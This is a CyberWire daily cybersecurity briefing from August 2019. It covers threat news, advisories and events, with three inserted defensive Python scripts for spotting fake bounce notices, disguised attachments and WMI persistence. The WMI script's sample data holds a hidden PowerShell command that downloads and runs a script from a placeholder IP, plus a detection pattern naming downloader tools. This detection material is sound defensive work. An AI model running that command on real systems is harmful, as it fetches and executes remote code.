Get your copy of the definitive guide to threat intelligence.
We brought together a team of experts and wrote the definitive guide to everything you need to know about threat intelligence. Whether you work in vulnerability management, incident response, or another part of cybersecurity, our book has something for you. Get your free copy of “The Threat Intelligence Handbook” now.
August 21, 2019.
This October: the CyberWire's 6th annual Women in Cybersecurity Reception.
Our 6th Annual Women in Cybersecurity Reception will be held this October 24th in the International Spy Museum's new facility at L'Enfant Plaza in Washington, DC. The Women in Cybersecurity Reception highlights and celebrates the value and successes of women in the cybersecurity industry. The event focuses on networking, and it brings together leaders from the private sector, academia and government from across the region, and women at varying points in their careers. It's not a marketing event; it's just about creating connections. If you're interested in getting an invitation to this year's event, tell us a little bit about yourself and request one here. A very limited number of sponsorship opportunities remain, so please let us know if you're interested in one of those, too.
By the CyberWire staff
After Twitter on Monday identified and suspended 936 accounts it determined were conducting information operations against the ongoing protests in Hong Kong (and changed its advertising policy to stop accepting paid advertising from state-controlled media), and after Facebook took down seven pages, three groups, and five accounts for the same coordinated inauthentic behavior, China's government protested the companies' actions. Beijing says the accounts belonged to Chinese citizens living temporarily overseas who were expressing their patriotic outrage over the Hong Kong protests. China's government added, Reuters reports, that it also had a "right to tell its story."
Group-IB has a follow-up report on Silence, the Russian-speaking criminal gang it has tracked for the last three years. Initially marked by slovenly opsec and a target set largely confined to Russia, Silence has upgraded its security game and expanded internationally. Its expansion and improvement seem opportunistic and derivative, repurposing code and perhaps personnel from other gangs, notably TA505. Its customary infection technique is phishing, beginning with a reconnaissance phase: bogus email delivery failure notices that carry no payload and serve to confirm which addresses are live before the weaponized mailing goes out.
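A reconnaissance mailing that poses as a bounce has to imitate what a mail server would have produced, and it usually gets the details wrong. The script below, an added example that is not part of the CyberWire briefing or of Group-IB's report, checks a purported delivery-failure notice against the shape of a real one: RFC 3464 delivery status notifications are multipart/report with report-type=delivery-status, are sent with a null envelope sender (Return-Path: <>), carry an Auto-Submitted header (RFC 3834), and never ask the reader to click anything. The header heuristics, the regular expressions and the two sample messages are all mine and constructed for illustration, not captured mail.

```python
"""Flag messages that claim to be delivery-failure notices but do not look
like ones a mail server generated (added example; samples are constructed)."""
import email
import re
from email import policy

# Subjects that claim the message is a bounce (assumed patterns, extend as needed).
BOUNCE_SUBJECT = re.compile(
    r"undeliver|delivery (status|failure)|mail delivery failed|returned mail", re.I
)
# A genuine DSN has nothing for the recipient to do; a lure always does.
CALL_TO_ACTION = re.compile(r"https?://|click here|retry sending", re.I)


def ndr_findings(raw: bytes) -> list[str]:
    """Return the reasons a purported bounce looks fake (empty list if it passes)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    if not BOUNCE_SUBJECT.search(str(msg.get("Subject", ""))):
        return []  # does not claim to be a bounce; this rule does not apply
    findings = []

    # RFC 3464: DSNs are sent with an empty reverse-path so they cannot loop.
    return_path = str(msg.get("Return-Path", "")).strip()
    if return_path not in ("", "<>"):
        findings.append(f"envelope sender is {return_path}; a real DSN uses <>")

    # RFC 3464: the container is multipart/report with a delivery-status part.
    ctype = msg.get_content_type()
    if ctype != "multipart/report" or msg.get_param("report-type") != "delivery-status":
        findings.append(f"body is {ctype}, not multipart/report;report-type=delivery-status")

    # RFC 3834: automatically generated mail marks itself.
    if not msg.get("Auto-Submitted"):
        findings.append("no Auto-Submitted header (automated mail should carry one)")

    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body else ""
    if CALL_TO_ACTION.search(text):
        findings.append("bounce text contains a link or a call to action")
    return findings


# Constructed sample: what a Postfix-style DSN looks like.
LEGIT_BOUNCE = b"""Return-Path: <>
From: Mail Delivery System <MAILER-DAEMON@mx.example.net>
To: alice@example.com
Subject: Undelivered Mail Returned to Sender
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status; boundary="b1"

--b1
Content-Type: text/plain; charset=us-ascii

This is the mail system at host mx.example.net. The message could not be delivered.
--b1
Content-Type: message/delivery-status

Reporting-MTA: dns; mx.example.net
Final-Recipient: rfc822; nobody@example.org
Action: failed
Status: 5.1.1
--b1--
"""

# Constructed sample: a lure dressed up as a bounce.
FAKE_BOUNCE = b"""Return-Path: <postmaster@example-delivery.test>
From: "Mail Delivery Service" <postmaster@example-delivery.test>
To: alice@example.com
Subject: Delivery Status Notification (Failure)
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<p>Your message could not be delivered.
<a href="http://example-delivery.test/retry">Click here</a> to retry sending.</p>
"""

if __name__ == "__main__":
    for label, sample in (("legit", LEGIT_BOUNCE), ("fake", FAKE_BOUNCE)):
        print(label, ndr_findings(sample))
```

A reconnaissance notice with no payload may trip only the first three checks; that is still three structural tells, and the empty body is itself worth a look when the same "bounce" reaches many mailboxes in one organisation within minutes.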
Stars and Stripes reports that US servicemembers are caught up in a large South Korean credit card breach.
Scammers are gaming search engine results with paid advertising so that their own phone numbers appear at the top of search results for the help lines of well-known brands, Naked Security reports. The ads seem to make economic sense for the criminals: they get a solid return on their marketing investment. Voice assistants have proven particularly vulnerable to this form of deception, since a number read aloud from the top result carries none of the visual cues (such as an "Ad" label) that might warn a user looking at a screen.
Today's issue includes events affecting Armenia, Australia, Austria, Azerbaijan, Belarus, China, Cyprus, Czech Republic, Denmark, European Union, Georgia, Germany, Greece, India, Iran, Israel, Kazakhstan, Kenya, Republic of Korea, Kyrgyzstan, Latvia, Malaysia, New Zealand, Poland, Romania, Russia, Serbia, Switzerland, Taiwan, Turkey, Ukraine, United Kingdom, United States, Uzbekistan, and Vietnam.
Bring your own context.
Bug bounties used to be a mom-and-pop segment of the security market, but that's changed.
"We're definitely seeing more adoption. It's becoming much more mainstream, I would say. And also, we're actually starting to see the rewards more accurately reflect the type of value that these kinds of bugs have. You're seeing organizations offering rewards in the tens or, in some places, even hundreds of thousands of dollars, which really makes it worth that investment on behalf of the researcher to be spending the time to find these unique and interesting vulnerabilities in software."
—Ben Waugh, chief security officer at Redox, on the CyberWire Daily Podcast, 8.19.19.
Companies are also growing more comfortable with outsiders looking at their systems. (The outsiders are going to poke around in any case, right?)
Is your cybersecurity program aligned with your business goals and objectives?
Cybersecurity is a business risk, not an IT problem, and a critical part of business strategy. Security should not be an afterthought. Taking a proactive approach facilitates board-level buy-in for cyber initiatives, supports traction across business units, establishes management alignment on key priorities, and manages data complexity. Let Edwards Performance Solutions better structure and position your cybersecurity program, making it a business asset for continued success.
Cyber Warrior Women Summer Social: Sip and Paint(Columbia, MD, United States, August 21, 2019) Join the Cybersecurity Association of Maryland, Inc. (CAMI) for the annual Cyber Warrior Women Summer Social, an all-about-fun-and-networking event! We're adding an artistic element to this year's event with a wine glass painting exercise. No previous art experience required.
Cyber Security Summits: Chicago on August 27 and on September 17 in Charlotte(Chicago, Illinois, United States, August 27, 2019) Register for reduced admission to the Cyber Security Summit with promo code cyberwire19 for $95 admission ($350 without code). Sr. Level Executives are invited to learn about the latest threats & solutions in Cyber Security from experts from The FBI, Google, IBM, Darktrace, and more. Breakfast, Lunch & Cocktail Reception are included with your admission. Passes are limited, secure yours today: www.CyberSummitUSA.com
Second Annual DataTribe Challenge(Online, October 1, 2019) Register now for a chance to be DataTribe's next world-class company. Finalists will split a $20,000 prize, and the winner may receive $2m in funding from DataTribe. Contestants have until October 1st to apply at www.datatribe.com/challenge.
Zero Day Con(Washington, DC, USA, October 22, 2019) Zero Day Con hosts a day of expert discussion on security approaches to regain control over your systems, data, and information. Join us to examine insights, security technologies, and key priorities to secure your systems. Get a 30% discount for Labor Day using code LABOR30.
Cyber Attacks, Threats, and Vulnerabilities
Attacks by Silence(Group-IB) A comprehensive technical analysis of this small cybercriminal group’s tools, tactics, and evolution. This is the first time Group-IB’s reports of this kind have been made publicly available.
New Phishing Campaign Bypasses Microsoft ATP to Deliver Adwind to Utilities Industry(Cofense) The Cofense Phishing Defense Center has observed a new phishing campaign that spoofs a PDF attachment to deliver the notorious Adwind malware. The campaign was found specifically in national grid utilities infrastructure. Adwind, aka jRAT or SockRat, is sold as malware-as-a-service: users purchase access to the software for a small subscription fee. The malware takes screenshots; harvests credentials from Chrome, IE and Edge; accesses the webcam to record video and take photos; records audio from the microphone; transfers files; collects general system and user information; steals VPN certificates; and serves as a keylogger.
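An attachment that is "spoofed" as a PDF still has to be whatever it really is on disk: Adwind is a Java archive, a JAR is a ZIP container, and a ZIP starts with the bytes PK\x03\x04 where a PDF starts with %PDF-. The script below is an added example (not Cofense's code or the briefing's) of the check a mail gateway or triage script can make: compare each attachment's declared type, from both the MIME Content-Type and the filename extension, against its leading bytes. The signature table, the expectation table and the sample message are my own constructions; the list of types is deliberately short and is meant to be extended.

```python
"""Detect attachments whose file signature contradicts the type they claim
(added example; the sample message is constructed, not a captured lure)."""
import email
from email import policy
from email.message import EmailMessage

# Leading bytes of the formats a gateway most often has to tell apart (assumed table).
SIGNATURES = {
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip",        # also .jar, .docx, .xlsx, .apk: all ZIP containers
    b"MZ": "exe",                # PE executables, DLLs, screensavers
    b"\xd0\xcf\x11\xe0": "ole",  # legacy .doc/.xls, the macro-bearing kind
}

# Which signature each declared type may legitimately have (assumed table).
EXPECTED = {
    "application/pdf": {"pdf"}, "pdf": {"pdf"},
    "application/zip": {"zip"}, "zip": {"zip"},
    "application/java-archive": {"zip"}, "jar": {"zip"},
    "docx": {"zip"}, "xlsx": {"zip"},
    "doc": {"ole", "zip"}, "xls": {"ole", "zip"},
    "application/x-msdownload": {"exe"}, "exe": {"exe"},
}


def sniff(data: bytes) -> str:
    """Classify content by its magic bytes; 'unknown' if none of the table matches."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def attachment_mismatches(raw: bytes) -> list[dict]:
    """Return one record per attachment whose content disagrees with its declared type."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
        ctype = part.get_content_type()
        actual = sniff(part.get_payload(decode=True) or b"")
        reasons = []
        # Check each declaration separately so "Invoice.pdf.jar" sent as
        # application/pdf is still caught even though .jar and ZIP agree.
        for declared in (ctype, ext):
            expected = EXPECTED.get(declared)
            if expected and actual not in expected:
                reasons.append(f"declared {declared!r} but content signature is {actual!r}")
        if reasons:
            findings.append({"filename": name, "declared": ctype,
                             "actual": actual, "reasons": reasons})
    return findings


def build_sample() -> bytes:
    """Constructed message: one honest PDF and one ZIP/JAR wearing a .pdf name."""
    m = EmailMessage()
    m["From"] = "billing@example-utility.test"
    m["To"] = "ops@example-grid.test"
    m["Subject"] = "Remittance advice"
    m.set_content("See attached.")
    m.add_attachment(b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n1 0 obj\n<<>>\nendobj\n",
                     maintype="application", subtype="pdf", filename="Remittance.pdf")
    m.add_attachment(b"PK\x03\x04\x14\x00\x08\x08\x08\x00META-INF/MANIFEST.MF",
                     maintype="application", subtype="pdf", filename="Invoice_2019-08.pdf")
    return m.as_bytes()


if __name__ == "__main__":
    for hit in attachment_mismatches(build_sample()):
        print(hit)
```

The decision is made on the decoded payload, not on the base64 text, and on both declarations independently; a gateway that only compares extension to Content-Type is satisfied by a lure that lies consistently in both.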
Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response(TrendLabs Security Intelligence Blog) When we first investigated MyKings in 2017, we focused on how the cryptominer-dropping botnet malware used WMI for persistence. Like Mirai, MyKings seems to be constantly undergoing changes to its infection routine. The variant we analyzed for this incident did not just have a single method of retaining persistence but multiple ones, as discussed in the previous section. In addition to WMI, it also used the registry, the task scheduler, and a bootkit — the most interesting of which is the bootkit (detected by Trend Micro as Trojan.Win32.FUGRAFA.AB).
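Of the persistence mechanisms listed above, WMI event subscriptions are the one most often missed, because nothing of them appears in the registry Run keys or the task list: persistence is a trio of objects in root\subscription (an __EventFilter, an event consumer, and a __FilterToConsumerBinding tying them together). Sysmon records the creation of each as event IDs 19, 20 and 21. The script below is an added example (not Trend Micro's detection logic or anything from the briefing) that correlates those three events into complete bindings and rates the ones whose consumer executes code. Field names follow the Sysmon WMI event schema as I know it, the Name="..." reference format in event 21 and the consumer Type strings are assumptions about that schema, and the records are constructed rather than real telemetry.

```python
"""Correlate Sysmon WMI events (IDs 19/20/21) into filter->consumer bindings
and flag those that run code (added example; events below are constructed)."""
import re

# Consumer types that execute attacker-supplied content (assumed Sysmon Type strings).
CODE_EXEC_TYPES = {"Command Line", "Active Script"}
# Interpreters and download helpers that a legitimate consumer rarely needs.
SUSPICIOUS_DEST = re.compile(
    r"powershell|cmd\.exe|mshta|regsvr32|rundll32|wscript|cscript|certutil|bitsadmin|https?://",
    re.I,
)
# Event 21 refers to objects as e.g. CommandLineEventConsumer.Name="foo" (assumed format).
NAME_RE = re.compile(r'Name="([^"]*)"')


def _ref_name(ref: str) -> str:
    m = NAME_RE.search(ref or "")
    return m.group(1) if m else ref


def wmi_persistence(events: list[dict]) -> list[dict]:
    """Return one alert per binding created, with reasons drawn from its filter and consumer."""
    filters, consumers, alerts = {}, {}, []
    for e in events:
        if e.get("Operation") != "Created":
            continue  # deletions/modifications are out of scope for this rule
        if e["EventID"] == 19:
            filters[e["Name"]] = e
        elif e["EventID"] == 20:
            consumers[e["Name"]] = e
        elif e["EventID"] == 21:
            cname, fname = _ref_name(e["Consumer"]), _ref_name(e["Filter"])
            c, f = consumers.get(cname, {}), filters.get(fname, {})
            reasons = []
            if c.get("Type") in CODE_EXEC_TYPES:
                reasons.append(f"{c['Type']} consumer runs code on every filter match")
            if SUSPICIOUS_DEST.search(c.get("Destination", "")):
                reasons.append("consumer destination launches an interpreter or downloader")
            q = f.get("Query", "")
            if "__InstanceModificationEvent" in q and "Win32_PerfFormattedData" in q:
                reasons.append("filter polls a performance counter (timer-style trigger)")
            alerts.append({"user": e.get("User"), "consumer": cname, "filter": fname,
                           "severity": "high" if reasons else "low", "reasons": reasons})
    return alerts


SYSTEM = "NT AUTHORITY\\SYSTEM"
# Constructed records: a code-executing subscription, then the benign SCM trio
# that ships with Windows, to show the rule does not fire on everything.
SAMPLE_EVENTS = [
    {"EventID": 19, "EventType": "WmiFilterEvent", "Operation": "Created", "User": SYSTEM,
     "EventNamespace": "root\\cimv2", "Name": "updfilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 20, "EventType": "WmiConsumerEvent", "Operation": "Created", "User": SYSTEM,
     "Name": "updconsumer", "Type": "Command Line",
     "Destination": "cmd.exe /c powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/u.txt')\""},
    {"EventID": 21, "EventType": "WmiBindingEvent", "Operation": "Created", "User": SYSTEM,
     "Consumer": 'CommandLineEventConsumer.Name="updconsumer"',
     "Filter": '__EventFilter.Name="updfilter"'},
    {"EventID": 19, "EventType": "WmiFilterEvent", "Operation": "Created", "User": SYSTEM,
     "EventNamespace": "root\\cimv2", "Name": "SCM Event Log Filter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "EventType": "WmiConsumerEvent", "Operation": "Created", "User": SYSTEM,
     "Name": "SCM Event Log Consumer", "Type": "Event Log", "Destination": ""},
    {"EventID": 21, "EventType": "WmiBindingEvent", "Operation": "Created", "User": SYSTEM,
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
]

if __name__ == "__main__":
    for alert in wmi_persistence(SAMPLE_EVENTS):
        print(alert["severity"], alert["consumer"], "<-", alert["filter"], alert["reasons"])
```

Bindings whose filter or consumer was created before logging started still produce a (low) alert, which is deliberate: a new binding to an old consumer is exactly what a re-infection looks like, and the consumer's details can be pulled from root\subscription on the host when the alert is worked.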
Criminals on the Hunt For Ransomware on Underground Forums(Threatpost) A detailed look at underground forums shows that cybercriminals aren't sure where to look on the heels of the GandCrab ransomware group shutting its doors – and low-level actors are taking advantage of that by developing their own strains.
MoviePass security lapse exposed customer card numbers(TechCrunch) Movie ticket subscription service MoviePass has exposed tens of thousands of customer card numbers and personal credit cards because a critical server was not protected with a password. Mossab Hussein, a security researcher at Dubai-based cybersecurity firm SpiderSilk, found an exposed database on …
Sierra Wireless AirLink ALEOS (Update A)(CISA) CVSS v3 9.1. Attention: exploitable remotely, low skill level to exploit, public exploits are available. Vendor: Sierra Wireless. Equipment: AirLink ALEOS. Vulnerabilities: OS Command Injection, Use of Hard-coded Credentials, Unrestricted Upload of File with Dangerous Type, Cross-site Scripting, Cross-site Request Forgery, Information Exposure, Missing Encryption of Sensitive Data.
Siemens SCALANCE X Switches (Update A)(CISA) CVSS v3 8.6. Attention: exploitable remotely, low skill level to exploit. Equipment: SCALANCE X switches. Vulnerability (revised in Update A): Insufficient Resource Pool.
Zebra Industrial Printers(CISA) CVSS v3 5.3. Attention: low skill level to exploit. Equipment: Industrial Printers. Vulnerability: Insufficiently Protected Credentials. Risk evaluation: successful exploitation could allow a remote attacker to send specially crafted packets to a port on the printer, resulting in the retrieval of a front control panel passcode.
Beyond Compliance: Cyber Threats and Healthcare(FireEye) The healthcare vertical faces a range of threat actors and malicious activity. Given the critical role it plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential.
Gemini crypto exchange led by Winklevoss names Damato as CSO(Mobile Payments Today) Gemini Trust Co., a cryptocurrency exchange led by the Winklevoss brothers, has named David Damato, the former chief security officer at Tanium, as its new CSO. While at Tanium, Damato was in charge of building and managing a team that...
ZeroNorth Names John Worrall as CEO(Yahoo) ZeroNorth, the industry’s only provider of risk-based vulnerability orchestration, announced today that John Worrall has been named chief executive officer. Worrall brings more than 25 years of leadership, strategy and operational experience to the role, across early stage and established cybersecurity
U.S. Cities Rethink Data Relationship With Residents(Wall Street Journal) Cities across the country are measuring everything from air quality to traffic. Privacy rules and hackers’ interest in such information are prompting city officials to think carefully about how that information is managed.
Victimology: in the shoes of a cybersecurity analyst(ThreatQuotient) When a threat arises, the security team's role is to investigate and determine whether an attack is real and how severe it is. That investigation makes it possible to set up a plan to defeat the offensive and, more generally, to protect better against certain types of attacks.
Keeping cameras cyber safe: The perils of wireless connectivity(The Financial Express) Since modern cameras no longer use film to capture and reproduce images, the International Imaging Industry Association devised a standardised protocol known as Picture Transfer Protocol (PTP) to transfer digital images from camera to PC.
Don't Renew Section 215 Indefinitely(Electronic Frontier Foundation) The New York Times reported that the Trump administration wants Section 215, the legal authority that allows the National Security Agency to collect Americans’ telephone records, renewed indefinitely. That’s despite earlier reports the NSA had shuttered its Call Details Record (CDR) Program because...
Cyber Command head wants name changed(The Augusta Chronicle) U.S. Army Cyber Command is on its way to Augusta, but it might look a little different. During a keynote address at AFCEA’s TechNet Augusta 2019, Lt.
Reclaiming the rights to one’s digital persona(The Washington Times) Most individuals keep a pretty firm grip on their possessions — the cars, the house and the stuff inside it. They’ve got a fairly accurate grasp of their money, too, by taking a quick scan of their financial assets online. Personal data, though, is another story. The complexion of the information that tech giants glean from surveilling users’ Internet activities is as murky for most Americans as a trek in the woods after dark. Americans urgently need a more effective means of ensuring that their cyber-persona is not being stalked from the digital shadows by buck-raking marketers.
Mercedes caught up in privacy storm over car trackers(CNN) Mercedes-Benz is using location sensors to track and repossess vehicles in the United Kingdom when drivers fall behind on payments, raising privacy concerns and leading one prominent politician to call for a government investigation.
For a complete running list of events, please visit the Event Tracker on the CyberWire website.
SecureWorld Bay Area(Santa Clara, California, USA, August 21, 2019) Connecting, informing, and developing leaders in cybersecurity. For the past 17 years, SecureWorld conferences have provided more content and facilitated more professional connections than any other event...
Pittsburgh Cybersecurity Conference(Pittsburgh, Pennsylvania, USA, August 22, 2019) Data Connectors brings together security professionals to discuss mitigating risk and improving their overall security posture. Eight industry speakers, an FBI/NSA/DHS keynote speaker, and a CISO Panel...
Integrate(Melbourne, Victoria, Australia, August 27 - 29, 2019) Get ready to think beyond and lose yourself in the technology of tomorrow at Integrate 2019. Integrate is Australia's leading event dedicated to helping businesses harness the power of AV technology to...
Washington DC Cybersecurity Conference(Washington, DC, USA, August 29, 2019) Data Connectors brings together security professionals to discuss mitigating risk and improving their overall security posture. Eight industry speakers, an FBI/NSA/DHS keynote speaker, and a CISO Panel...